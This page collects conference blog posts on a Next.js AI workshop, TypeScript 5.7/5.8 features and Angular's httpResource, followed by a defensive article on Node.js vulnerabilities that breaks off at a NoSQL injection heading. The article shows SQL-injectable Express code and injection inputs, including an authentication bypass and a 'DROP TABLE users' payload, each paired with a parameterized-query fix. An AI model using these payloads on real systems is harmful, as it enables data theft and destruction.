Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman
https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ (09 Jul 2025)

In today’s fast-evolving web development landscape, integrating AI into your apps isn’t just a trend; it’s becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you’re exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The session begins with an overview of how AI, especially generative AI models, can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.
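To make the server-side variant concrete, here is a minimal sketch of what such an integration could look like; it is not taken from the session. It assumes a Next.js App Router project, an OpenAI-compatible chat-completions endpoint, and an API key in the OPENAI_API_KEY environment variable. Adjust the URL, model name, and response shape to whatever provider you actually use.

// app/api/chat/route.ts (illustrative sketch, not from the session)
export async function POST(req: Request) {
  const { prompt } = await req.json();

  // The API key stays on the server; it is never shipped to the browser.
  const response = await fetch('https://api.openai.com/v1/chat/completions', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      Authorization: `Bearer ${process.env.OPENAI_API_KEY}`,
    },
    body: JSON.stringify({
      model: 'gpt-4o-mini', // assumption: pick whatever model your provider offers
      messages: [{ role: 'user', content: prompt }],
    }),
  });

  const data = await response.json();
  // Chat-completion responses typically carry the text under choices[0].message.content.
  return Response.json({ answer: data.choices?.[0]?.message?.content ?? '' });
}

A client component can then POST the user’s prompt to /api/chat and render the returned answer, keeping all credentials on the server.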

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full session and start turning your ideas into intelligent applications today.

What’s New in TypeScript 5.7/5.8
https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ (26 Jun 2025)

TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript’s static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, this cannot be determined unambiguously for TypeScript. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
 let result: number
 if (myCondition()) {
   result = myCalculation();
 } else {
   const temporaryWork = myOtherCalculation();
   // Forgot to assign 'result' here
 }
 printResult();
 function printResult() {
   console.log(result); // no compiler error
 }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

Listing 2: Optimistic type check in different functional contexts

function foo() {
 let result: number
 // Further logic that never assigns to 'result'

 printResult();
 function printResult() {
   console.log(result); 
 // Variable 'result' is used before being assigned.(2454)
 }
}

Another type check ensures that methods with non-literal (“computed”) property names are consistently treated as index signatures in classes. Listing 3 shows this using a method declared with a computed (symbol) property name.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
 [sym]() { return 1; }
}
// Is interpreted as
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.
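A minimal sketch of the situation described above, not taken from the article’s listings; whether the error actually appears depends on your strictness flags (the classic setup for TS7011 is noImplicitAny enabled without strictNullChecks):

declare function loadConfig(): Promise<{ retries: number }>;

// TS7011: the handler implicitly returns 'null', i.e. an 'any' return type
const config = loadConfig().catch(() => null);

// Fix: make the intended return type explicit
const configFixed = loadConfig().catch((): { retries: number } | null => null);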

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript 2024 can now be used as the compile target (e.g., via the compiler flag --target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (“restock”). “Object.groupBy()” is passed the array to be grouped and a function that returns which group each item of the array belongs to. The return value is an object (here the variable “result”) that contains the different groups as properties. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, that property is “undefined.”

Listing 4: Grouping arrays with Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. In ES2024, the length of an ArrayBuffer can be changed (“resize()”), while a SharedArrayBuffer can only grow (“grow()”), so the two buffer variants have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype “ArrayBufferLike” is used. If a specific implementation is to be used, the buffer type can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer type. Listing 5 illustrates this: because the “Uint8Array” is created over a “SharedArrayBuffer,” its “view.buffer” property is typed as “SharedArrayBuffer,” so the buffer-specific “grow()” method is available.

Listing 5: TypedArrays with a generic buffer type

// New: TypedArray with a generic ArrayBuffer type
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Usage with a concrete type:
// here: SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` only exists on SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript now better supports tools that execute TypeScript files directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “--experimental-strip-types”). Direct execution of TypeScript can speed up development, for example by skipping the build/compile step between editing and running the code and only compiling later. This becomes possible when relative imports are adjusted: normally, imports do not have a file extension (see Listing 6), so the imports do not have to differ between the source code and the compiled result. Executing a file directly without translation, however, requires the “.ts” extension (Listing 6), and such an import usually results in a compiler error. With the new compiler option “--rewriteRelativeImportExtensions,” TypeScript extensions in relative imports are automatically rewritten (.ts/.tsx/.mts/.cts become .js/.jsx/.mjs/.cjs). On the one hand, this provides better support for direct execution. On the other hand, the same TypeScript files can still be compiled in the normal TypeScript build process, which is important, for example, for library authors who want to test their files quickly without a compile step but also need the real TypeScript build before publishing.

Listing 6: Import with .ts extension

import {Demo} from './bar'; // <- standard import
import {Demo} from './bar.ts'; // <- required for direct execution
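A tsconfig sketch for this setup might look as follows. This is my example, not from the article; the option names are the official TypeScript 5.7 flags, while the target and include path are assumptions for a typical project layout.

// tsconfig.json (sketch)
{
  "compilerOptions": {
    "module": "nodenext",
    "target": "es2024",
    "rewriteRelativeImportExtensions": true,
    "strict": true
  },
  "include": ["src/**/*.ts"]
}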

If the Node.js option “--experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy for Node.js to remove (strip) are used. To better support this use case, the new compiler option “--erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “--erasableSyntaxOnly”

// error: namespace with runtime code
namespace container {
}

class Point {
 // error: implicit properties / parameter properties
 constructor(public x: number, public y: number) { }
}

// error: enum declaration
enum Direction {
 Up,
 Down
}

Further Improvements

The TypeScript team wants to make the development process as pleasant as possible for all developers, and to this end it also uses new platform options under the hood. Node.js 22, for example, introduced a caching API (“module.enableCompileCache()”), which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling with tsc was about two to three times faster than before.
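For your own Node.js scripts, the same API can be switched on with a single call. A minimal sketch of my own, unrelated to tsc’s internal use, assuming a recent Node.js 22 release and a hypothetical ./app entry point:

// enable-cache.js: opt in to Node's on-disk compile cache
const { enableCompileCache } = require('node:module');

// Subsequent module loads are cached, so repeated startups parse and compile less.
enableCompileCache();

require('./app'); // './app' stands in for your real entry point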

By default, the compiler checks whether special “@typescript/lib-*” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually built-in TypeScript APIs. Previously, the check for such library packages was always performed, even if no library packages were used, which can mean unnecessary overhead for many files or in large projects. With the new compiler option “--libReplacement=false,” this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the search now continues further up the directory tree if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is around the corner and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript compiler is to be completely rewritten in Go for version 7. Initial tests have shown that the new Go-based compiler can deliver up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the --experimental-strip-types flag. New compiler options like --rewriteRelativeImportExtensions and --erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the --erasableSyntaxOnly compiler option do?
The --erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

Exploring httpResource in Angular 19.2
https://javascript-conference.com/blog/exploring-httpresource-angular-19/ (19 May 2025)

Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworld, underground, underwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Figure 1: Level 1 in overworld style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient under the hood enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.
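A minimal bootstrap sketch for this (my example, not from the article); the interceptor name and file paths are placeholders for whatever your application actually registers:

// main.ts (sketch)
import { bootstrapApplication } from '@angular/platform-browser';
import { provideHttpClient, withInterceptors } from '@angular/common/http';
import { AppComponent } from './app/app.component';
import { authInterceptor } from './app/auth.interceptor'; // placeholder interceptor

bootstrapApplication(AppComponent, {
  providers: [
    // httpResource delegates to HttpClient, so registered interceptors apply to it too
    provideHttpClient(withInterceptors([authInterceptor])),
  ],
});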

Level files

In our example, the different levels are described by JSON files that define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of blocks measuring 16×16 pixels. Alongside these level files, an overview.json file lists the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to create a computed signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a computed signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.
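For illustration, here is a rough sketch of what such a Zod-based map could look like. It is my example, not from the article; the schema only covers the fields visible in Listing 1, so it will not match the real Level interface exactly.

import { z } from 'zod';

// Rough schema for the level files from Listing 1 (item fields are simplified)
const levelSchema = z.object({
  levelId: z.number(),
  backgroundColor: z.string(),
  items: z.array(z.object({
    tileKey: z.string(),
    col: z.number(),
    row: z.number(),
  })),
});

// Additional method on the LevelLoader service (sketch)
getValidatedLevelResource(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      levelSchema.parse(raw); // throws on invalid payloads, which surfaces via the error signal
      return raw as Level;
    },
  });
}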

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information, which the example uses to display the download progress to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Figure 4: Reactive flow of ngMario

The signals levelKey, style, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

The tilesMapProgress signal uses the progress information provided by tilesMapResource to indicate how much of the tilemap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signals and passes them to the engine’s animateLevel or renderLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram above simply delegates to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  // undefined prevents the resource from being triggered
  const request = computed(() => {
    const tilesMap = tilesMapResource.value();
    return !tilesMap
      ? undefined
      : {
          tilesMap,
          style: style(),
        };
  });

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A computed signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer console and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.
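For illustration, a small sketch of how these members could be used in the LevelComponent. This is my example, not from the article; it assumes the usual resource API (an error signal and a writable value signal) and would extend the constructor already shown in Listing 6.

// Sketch: react to load errors and patch the local working copy of the level
constructor() {
  effect(() => {
    const error = this.levelResource.error();
    if (error) {
      console.error('Loading the level failed', error);
    }
  });
}

changeBackground(color: string) {
  // update() only changes the local working copy; nothing is written back to the server
  this.levelResource.value.update((level) => ({ ...level, backgroundColor: color }));
}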

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may eventually be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

Common Vulnerabilities in Node.js Web Applications
https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ (23 Apr 2025)

As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

Node.js Overview

Node.js is an open-source, cross-platform server environment that enables server-side JavaScript. It has been around since 2009 and has grown to be a favorite among developers when it comes to building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides high speed and performance.

The other important feature of Node.js is its non-blocking, event-driven architecture. This model has enabled Node.js to work well with many concurrent connections and, for this reason, has been applied in real-time applications including chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also enhances its adoption.

Figure: Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the libuv library, the event loop, and asynchronous I/O operations, including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

  • Event Loop: The event loop is the heart of Node.js. It’s in charge of coordinating asynchronous I/O operations and preventing the application from becoming unresponsive. Node.js performs an asynchronous operation, such as file read or network request, and registers a callback function; then it carries on executing other code. Once the operation is complete, the callback function is queued up in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not become unresponsive when performing time-consuming operations. Node.js does not block the thread and wait for the operation to finish; instead, it carries on executing other code. This makes Node.js able to perform many tasks simultaneously, which is very beneficial.
  • Modules and Packages: Node.js has a large number of modules and packages that can be loaded into an application quite easily. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world and is a treasure trove of modules that can help make your application better. However, the use of third-party packages also implies certain risks; if there is a vulnerability in a package, it can be easily exploited by an attacker.

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications are likely to deal with sensitive data, including personal information, financial information, and login credentials. This data has to be protected to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect that their data and activity on an application is secure. A security breach can jeopardize users’ trust and the reputation of the organization.
  • Compliance with Regulations: Many industries are strictly regulated with respect to data security and privacy. Node.js applications must comply with these rules in order to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations in terms of dollars and cents. These losses can be in the form of direct costs, such as fines and legal expenses, and indirect costs, including lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: The use of third-party packages is common in Node.js applications, posing security risks. Flaws in these packages can be exploited by attackers to take over the application. It is crucial to update and scan these packages frequently to reduce these risks.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;
const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {
  if (err) throw err;
  // Process result
});

If an attacker inputs admin' -- as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The -- sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;
const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {
  if (err) throw err;
  // Process result
});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');
const mysql = require('mysql');

const app = express();

// Database connection
const connection = mysql.createConnection({
  host: 'localhost',
  user: 'root',
  password: 'password',
  database: 'users_db'
});

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // VULNERABLE CODE: Direct concatenation of user input
  const query = "SELECT * FROM users WHERE id = " + userId;

  connection.query(query, (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

This attempts to delete the entire users table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // SECURE CODE: Using parameterized queries
  const query = "SELECT * FROM users WHERE id = ?";

  connection.query(query, [userId], (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically (see the sketch after this list).
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.
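As a rough illustration of point 2 (my sketch, not from the article), the same lookup with Sequelize lets the library bind the values for you. The model definition is simplified and assumes a users table with username and password columns; in a real application passwords would of course be hashed.

const { Sequelize, DataTypes } = require('sequelize');

const sequelize = new Sequelize('users_db', 'root', 'password', {
  host: 'localhost',
  dialect: 'mysql',
});

// Simplified model for illustration only
const User = sequelize.define('User', {
  username: DataTypes.STRING,
  password: DataTypes.STRING,
});

async function findUser(username, password) {
  // Sequelize generates a parameterized query; the values are never concatenated into SQL
  return User.findOne({ where: { username, password } });
}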

NoSQL Injection

